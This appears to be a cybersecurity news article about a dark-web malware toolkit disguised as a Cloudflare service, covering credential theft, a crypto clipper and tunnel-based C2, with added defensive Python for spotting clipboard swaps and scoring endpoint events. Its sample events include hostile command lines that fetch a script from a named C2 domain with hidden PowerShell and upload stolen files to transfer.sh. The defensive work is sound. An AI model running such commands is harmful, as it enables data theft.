Scammers Allegedly Selling Fake Cloudflare Services


A clandestine threat actor is allegedly selling a sophisticated malware suite masquerading as a Cloudflare enterprise service on dark web forums.

Dubbed “Fake Cloudflare Service,” the toolkit claims to leverage undetected payloads and Cloudflare infrastructure to bypass security systems, with capabilities spanning credential theft, cryptocurrency hijacking, and remote command execution (RCE).

Infiltration and Data Exfiltration

The toolkit is deployed by PowerShell scripts that combine obfuscation with error suppression (e.g., -ErrorAction SilentlyContinue, which hides failed steps from the user rather than obfuscating anything) to keep the installation quiet and evade detection.

Once installed, it establishes persistence via a multi-threaded Python script (server.pyw; the .pyw extension runs under pythonw.exe with no console window), which then runs the following modules:

  • Credential Harvesting: Targets browser cookies and saved passwords, data from 30+ browser extensions including Phantom Wallet, and Discord tokens.
  • File Exfiltration: Automatically zips sensitive data (private keys, Telegram files, and documents) and exfiltrates it via transfer[.]sh.
  • Auth Key Theft: Specifically designed to extract Axiom and BullX authentication keys, which give the attacker API-level access to the victim's accounts on those platforms.

Cryptocurrency and Wallet Targeting

The malware integrates a multi-chain crypto clipper capable of intercepting transactions across 20+ blockchain networks, including Ethereum, Solana, and Binance Smart Chain.

This module:

  • Modifies wallet addresses in clipboard data.
  • Targets browser extensions (e.g., MetaMask) and software wallets.
  • Uses Cloudflare Tunnel (via the flask_cloudflared package, which starts a cloudflared quick tunnel and exposes the local Flask listener under a *.trycloudflare.com hostname) so that C2 traffic appears as ordinary HTTPS to Cloudflare's edge rather than to an attacker-owned server.
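A clipper can only substitute an address if it first recognises what kind of address sits in the clipboard, so that the replacement has the format the victim's wallet expects. The following is an added example, not code from the listing or from Cloudflare: it classifies the EVM and Solana formats the article names, and goes one step further with Bitcoin legacy base58check, whose checksum shows why a clipper must replace the whole address rather than mutate a few characters. The same classifier is then used defensively in detect_swap(), which flags a copy/paste pair where the chain is preserved but the address changed. Every address in the demo is constructed.

```python
"""Recognise wallet addresses the way a multi-chain clipper must, then reuse
that logic on the defender's side to catch a clipboard substitution.

Added example, not the toolkit's code. Formats covered: EVM (0x + 40 hex),
Solana (base58 of a raw 32-byte key, no checksum) and Bitcoin legacy
base58check (version byte + 20-byte hash + 4-byte double-SHA256 checksum).
"""
import hashlib
import re
from typing import List, Optional, Tuple

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(raw: bytes) -> str:
    """Base58-encode bytes; each leading zero byte becomes a leading '1'."""
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(s: str) -> Optional[bytes]:
    """Inverse of b58encode; None if s contains a non-alphabet character."""
    n = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58check_encode(version: int, payload: bytes) -> str:
    """Build a Bitcoin-style base58check string (used here to construct test data)."""
    body = bytes([version]) + payload
    checksum = hashlib.sha256(hashlib.sha256(body).digest()).digest()[:4]
    return b58encode(body + checksum)


def classify(addr: str) -> Optional[str]:
    """Return the chain family of an address, or None if it is not one we recognise."""
    if re.fullmatch(r"0x[0-9a-fA-F]{40}", addr):
        return "evm"  # Ethereum, BSC and other EVM chains share this format
    raw = b58decode(addr)
    if raw is None:
        return None
    if len(raw) == 25:  # base58check: version + hash160 + checksum
        payload, checksum = raw[:-4], raw[-4:]
        if hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum:
            return "bitcoin"
        return None  # right length, wrong checksum: a wallet would reject it too
    if len(raw) == 32 and 32 <= len(addr) <= 44:  # Solana public key
        return "solana"
    return None


# Candidate tokens: hex EVM addresses, or runs of base58 characters of plausible length.
ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{40}|[1-9A-HJ-NP-Za-km-z]{25,44}")


def find_addresses(text: str) -> List[Tuple[str, str]]:
    """Return (address, chain) for every recognised address in free text."""
    found = []
    for token in ADDRESS_RE.findall(text):
        chain = classify(token)
        if chain:
            found.append((token, chain))
    return found


def detect_swap(copied: str, pasted: str) -> bool:
    """Clipper signature: between copy and paste an address changed but kept its chain."""
    a, b = find_addresses(copied), find_addresses(pasted)
    if not a or len(a) != len(b):
        return False
    return any(x[1] == y[1] and x[0] != y[0] for x, y in zip(a, b))


if __name__ == "__main__":
    victim = b58check_encode(0, b"\x55" * 20)    # constructed, not a real wallet
    attacker = b58check_encode(0, b"\xaa" * 20)  # constructed, not a real wallet
    print(classify(victim), classify("11111111111111111111111111111111"), classify("0x" + "ab" * 20))
    print("swap detected:", detect_swap(f"pay {victim} now", f"pay {attacker} now"))
```

In practice detect_swap() would be fed the clipboard contents captured at copy time and again just before the paste is committed; a wallet front end that does this comparison catches the clipper regardless of which chain it targets. Note that a cross-chain mismatch is deliberately not flagged: a clipper preserves the format, and a different chain is almost always a user error.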

Remote Command Execution and Phishing

Operators gain direct access to an infected host through a /exec command that runs arbitrary commands on it. This is a capability of the malware's own C2 protocol, not an exploit of Cloudflare: the toolkit relies on Cloudflare's infrastructure only to carry its traffic and does not depend on any vulnerability in the service.

Additionally, the toolkit abuses Cloudflare Workers for transparent phishing by proxying legitimate login pages (e.g., Microsoft 365, AWS) and intercepting credentials in real-time.

Domain Infrastructure and Evasion

The service provides purchasers with domains routed through Cloudflare’s IPs to mimic legitimate traffic. This tactic mirrors recent campaigns where threat actors exploited Cloudflare’s reverse proxy architecture to host phishing sites.

A sample domain list includes:

Domain Type         Example                    Purpose
Phishing Landing    auth-cloudflare[.]net      Credential harvesting
C2 Server           cdn-api-secure[.]com       Payload delivery
Blockchain Proxy    gateway-eth[.]services     Crypto transaction interception

Cloudflare’s Response and Historical Context

Cloudflare has denied hosting malicious domains linked to recent breaches, but its services are a recurring component of attacker infrastructure, and its own controls have slipped: in February 2025, a misconfigured abuse remediation system caused a 59-minute outage of R2 object storage, highlighting systemic risk in how those controls are applied.

The company has faced prior criticism for hosting 40% of typosquatting sites and 62% of major pirate platforms.

Implications and Mitigation

Security firms like Netskope warn that such toolkits exploit Cloudflare’s scale to legitimize attacks. Recommended actions include:

  • Enforcing multi-factor authentication (MFA) on the accounts whose auth keys and session tokens the stealer targets, and rotating any key that may have been exposed (MFA protects the login, not an already-stolen API key).
  • Monitoring for anomalous Cloudflare Tunnel connections: cloudflared processes and *.trycloudflare.com hostnames on endpoints that have no business reason to run them.
  • Adopting behavioral analysis tools to detect PowerShell obfuscation and memory-resident payloads.
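The deployment chain described above leaves a recognisable trail on an endpoint: PowerShell launched with a hidden window, execution-policy bypass and error suppression; a console-less .pyw script under pythonw.exe; flask_cloudflared or cloudflared starting a quick tunnel; and an upload to transfer.sh. The following is an added example, not from the listing or from any vendor, that scores constructed process and network events against those indicators. The key=value event layout (host=, image=, cmdline=, dest=) is assumed for the demo and is not a real product schema; the weights are a starting point, not a tuned model.

```python
"""Triage endpoint events for the PowerShell -> server.pyw -> Cloudflare Tunnel
chain described in the article. Added example; event lines are constructed.
"""
import re
from typing import Dict, List, NamedTuple, Tuple


class Finding(NamedTuple):
    line_no: int
    host: str
    score: int
    reasons: Tuple[str, ...]


# (pattern, weight, reason). Weak signals (error suppression alone) score low on
# purpose: admin scripts use them too, and they only matter in combination.
INDICATORS = [
    (re.compile(r"powershell(\.exe)?\b.*-(?:w|windowstyle)\s+hidden", re.I), 2, "hidden PowerShell window"),
    (re.compile(r"powershell(\.exe)?\b.*-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "base64-encoded PowerShell command"),
    (re.compile(r"-ErrorAction\s+SilentlyContinue", re.I), 1, "PowerShell error suppression"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"pythonw(\.exe)?\b.*\.pyw\b", re.I), 2, "console-less Python (.pyw) launched"),
    (re.compile(r"\bcloudflared(\.exe)?\b.*\btunnel\b", re.I), 2, "cloudflared tunnel process"),
    (re.compile(r"\.trycloudflare\.com\b", re.I), 3, "Cloudflare quick-tunnel hostname"),
    (re.compile(r"flask_cloudflared", re.I), 3, "flask_cloudflared package in use"),
    (re.compile(r"https?://transfer\.sh/", re.I), 2, "upload to transfer.sh"),
]
HOST_RE = re.compile(r"\bhost=(\S+)")


def score_line(line: str) -> Tuple[int, Tuple[str, ...]]:
    """Sum the weights of every indicator that fires on one event line."""
    hits = [(w, reason) for rx, w, reason in INDICATORS if rx.search(line)]
    return sum(w for w, _ in hits), tuple(r for _, r in hits)


def triage(lines: List[str], threshold: int = 2) -> List[Finding]:
    """Return events whose cumulative indicator weight reaches the threshold."""
    findings = []
    for i, line in enumerate(lines, 1):
        score, reasons = score_line(line)
        if score >= threshold:
            m = HOST_RE.search(line)
            findings.append(Finding(i, m.group(1) if m else "?", score, reasons))
    return findings


def summarize_by_host(lines: List[str]) -> Dict[str, int]:
    """Aggregate scores per host so a chain of individually weak events stands out."""
    totals: Dict[str, int] = {}
    for line in lines:
        m = HOST_RE.search(line)
        host = m.group(1) if m else "?"
        totals[host] = totals.get(host, 0) + score_line(line)[0]
    return totals


# Constructed events in an assumed key=value layout (not a real EDR/Sysmon schema).
# The C2 domain is the example from the article's sample domain list.
SAMPLE_EVENTS = [
    "host=WS-01 image=powershell.exe cmdline=powershell.exe -w hidden -ep bypass -c iwr https://cdn-api-secure.com/s.ps1 -OutFile s.ps1 -ErrorAction SilentlyContinue",
    "host=WS-02 image=powershell.exe cmdline=powershell.exe -NoProfile -Command Get-ChildItem C:\\logs -ErrorAction SilentlyContinue",
    "host=WS-01 image=pythonw.exe cmdline=pythonw.exe C:\\Users\\victim\\AppData\\Roaming\\server.pyw",
    "host=WS-01 image=python.exe cmdline=python.exe -m pip install --quiet flask_cloudflared",
    "host=WS-01 image=cloudflared.exe cmdline=cloudflared.exe tunnel --url http://127.0.0.1:5000",
    "host=WS-01 image=pythonw.exe dest=plane-moss-bronze-cake.trycloudflare.com:443 proto=tcp",
    "host=WS-01 image=curl.exe cmdline=curl.exe --upload-file C:\\Users\\victim\\AppData\\Local\\Temp\\loot.zip https://transfer.sh/loot.zip",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"line {f.line_no} {f.host} score={f.score}: {', '.join(f.reasons)}")
    print(summarize_by_host(SAMPLE_EVENTS))
```

The benign WS-02 line (an admin script that only suppresses errors) scores 1 and is not reported, while every step of the chain on WS-01 is, and the per-host total makes the combination obvious even if no single event would justify an alert on its own. Quick-tunnel hostnames are the strongest single indicator: they are random words under trycloudflare.com and almost never appear in legitimate enterprise traffic.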

The listing’s operators remain unidentified, but their product underscores the escalating weaponization of legitimate SaaS platforms in cybercrime.

Cloudflare has yet to comment on this specific campaign.

AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
